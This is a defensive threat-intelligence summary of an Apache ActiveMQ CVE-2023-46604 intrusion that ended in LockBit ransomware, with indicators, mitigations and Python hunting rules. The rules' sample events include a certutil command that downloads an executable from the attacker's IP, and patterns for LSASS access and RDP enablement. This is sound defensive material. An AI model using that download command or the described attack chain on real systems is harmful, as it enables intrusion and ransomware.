
ActiveMQ Vulnerability Triggers LockBit Ransomware Attack

Threat Overview

On 2026-02-23 the DFIR Report identified a multi‑stage intrusion that began with exploitation of the CVE‑2023‑46604 vulnerability in an internet‑facing Apache ActiveMQ instance. The threat actor achieved remote code execution via a malicious Spring bean configuration XML, downloaded a Metasploit stager, and progressed to a full‑blown LockBit ransomware campaign. The attack demonstrates how a single unpatched service can become a launchpad for enterprise‑wide compromise.

Attack Vector

The initial compromise leveraged an RCE in Apache ActiveMQ that allowed the attacker to inject a Java Spring class reference (org.springframework.context.support.ClassPathXmlApplicationContext) and a URL pointing to a crafted XML file. The XML contained a command that used the Windows CertUtil utility to download a Metasploit stager. Once executed, the stager provided the attacker with a foothold on the beachhead host.

Post‑Exploitation Activities

After the Metasploit stager was installed, the actor executed a series of post‑exploitation actions:

  • Elevated privileges via the Metasploit “GetSystem” command, creating a new service (kesknq) that exploited a privileged service account.
  • Dumped LSASS memory on multiple hosts to harvest domain administrator credentials.
  • Performed network scanning using SMB traffic, identifying potential lateral movement targets.
  • Installed AnyDesk on the beachhead host, enabling remote control and persistence through an automatically starting service.
  • Executed a custom batch file (rdp.bat) to enable RDP on the network, opening firewall rules and configuring the RDP port to 3389.

Ransomware Deployment

Seventeen days after the initial intrusion, the actor returned to the same unpatched ActiveMQ server, re‑established a foothold, and repeated the privilege escalation and credential harvesting steps. Using the compromised credentials, the attacker logged into backup and file servers via RDP, dropped two LockBit ransomware binaries (LB3_pass.exe and LB3.exe), and executed them with specific path and password flags. The binaries were launched interactively through RDP sessions, and the attack persisted for approximately four hours before the actor ceased activity. The Time to Ransomware (TTR) from first access to ransomware deployment was 419 hours (~19 calendar days). Had an organization only detected the second intrusion, the window for mitigation would have been less than 90 minutes.

Indicators of Compromise

Key indicators include:

  • ActiveMQ RCE alerts: ET INFO Apache ActiveMQ Instance – Vulnerable to CVE‑2023‑46604, ET EXPLOIT Successful Apache ActiveMQ Remote Code Execution (CVE‑2023‑46604).
  • Metasploit stager downloads via CertUtil: IP 166.62.100.52, Sysmon event ID 11 (FileCreate) showing certutil.exe writing the downloaded file.
  • Service creation and persistence: kesknq service, AnyDesk service (auto‑start).
  • Credential dumping: LSASS memory access on multiple hosts.
  • RDP configuration changes: batch file rdp.bat, firewall rule additions, registry modifications for RDP.
  • LockBit binaries: SHA256 hashes C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE and 8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6.

Recommendations

To mitigate similar attacks, security teams should:

  • Patch promptly: Ensure Apache ActiveMQ and all related components are updated to the latest version to close CVE‑2023‑46604.
  • Implement network segmentation: Restrict external access to critical services and isolate ActiveMQ behind a firewall with strict inbound rules.
  • Deploy Web Application Firewall (WAF) rules: Block malicious OpenWire traffic patterns that match known exploitation signatures. Note that OpenWire is a binary protocol on TCP port 61616 rather than HTTP, so the signatures that fire on this traffic are network IDS/IPS rules such as the ET INFO and ET EXPLOIT alerts listed above, placed in front of the broker.
  • Enforce least privilege: Harden service accounts, disable unused administrative accounts, and enforce MFA for domain administrators.
  • Monitor for certificate tool misuse: Alert on CertUtil downloads from external IPs, especially when paired with new executable creation.
  • Enable endpoint detection and response (EDR): Detect and block suspicious service creation, DLL injection, and RDP configuration changes.
  • Implement proper backup hygiene: Keep offline, immutable backups and test restoration procedures to reduce ransomware impact.
  • Conduct threat hunting: Search logs for failed and successful RCE attempts, LSASS memory reads, and remote service execution patterns.
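The hunting and monitoring items above (CertUtil downloads, new service installs, LSASS access, RDP enablement) can be expressed as a handful of rules over endpoint telemetry. The following is an added example written for this summary, not code from the DFIR Report or ESSGroup; the log lines are constructed in a simplified "EventID|Field=Value" shape, and the LSASS allowlist and Temp-path heuristic are assumptions a team would tune to its own environment.

```python
import re

# Constructed sample telemetry (not real logs from the incident), shape "EventID|Field=Value|...".
# Sysmon IDs: 1 ProcessCreate, 10 ProcessAccess, 11 FileCreate; 7045 is the System-log service install.
SAMPLE_EVENTS = [
    "1|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://166.62.100.52/stage.exe C:\\Users\\Public\\stage.exe",
    "11|Image=C:\\Windows\\System32\\certutil.exe|TargetFilename=C:\\Users\\Public\\stage.exe",
    "7045|ServiceName=kesknq|ImagePath=C:\\Windows\\Temp\\svc.exe",
    "10|SourceImage=C:\\Windows\\Temp\\svc.exe|TargetImage=C:\\Windows\\system32\\lsass.exe|GrantedAccess=0x1010",
    "1|Image=C:\\Windows\\System32\\reg.exe|CommandLine=reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "1|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe notes.txt",
]

KNOWN_BAD_SERVICES = {"kesknq"}  # service name reported in the write-up
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}  # assumed allowlist; tune per environment

def parse_event(line):
    """Split one constructed log line into a dict keyed by field name."""
    eid, *fields = line.split("|")
    event = dict(f.split("=", 1) for f in fields)
    event["EventID"] = int(eid)
    return event

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def match_event(e):
    """Return a detection label for one event, or None if no rule fires."""
    eid, cmd = e["EventID"], e.get("CommandLine", "")
    if eid == 1 and basename(e.get("Image", "")) == "certutil.exe" \
            and re.search(r"-urlcache|-verifyctl|https?://", cmd, re.I):
        return "certutil_download"                 # CertUtil used as a downloader
    if eid == 11 and basename(e.get("Image", "")) == "certutil.exe" \
            and e.get("TargetFilename", "").lower().endswith((".exe", ".dll")):
        return "certutil_dropped_executable"       # CertUtil wrote an executable to disk
    if eid == 7045 and (e.get("ServiceName", "").lower() in KNOWN_BAD_SERVICES
                        or "\\temp\\" in e.get("ImagePath", "").lower()):
        return "suspicious_service_install"        # GetSystem-style or Temp-backed service
    if eid == 10 and basename(e.get("TargetImage", "")) == "lsass.exe" \
            and basename(e.get("SourceImage", "")) not in LSASS_ALLOWLIST:
        return "lsass_access"                      # credential-dumping candidate
    if eid == 1 and "fdenytsconnections" in cmd.lower() and re.search(r"/d\s+0\b", cmd):
        return "rdp_enabled_via_registry"          # RDP switched on (rdp.bat-style change)
    return None

def hunt(lines):
    """Run every rule over the log lines and return the labels that fired, in order."""
    hits = [match_event(parse_event(line)) for line in lines]
    return [h for h in hits if h]
```

Running `hunt(SAMPLE_EVENTS)` flags the five malicious lines and ignores the benign notepad launch; in production the same rules would read Sysmon and System-log events from your SIEM instead of the constructed list.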

Conclusion

This incident underscores the importance of timely patch management, vigilant monitoring, and a layered security approach. By addressing the root vulnerabilities and strengthening detection capabilities, organizations can prevent initial compromise and limit the reach of subsequent ransomware deployments.

Copyright © 2025 ESSGroup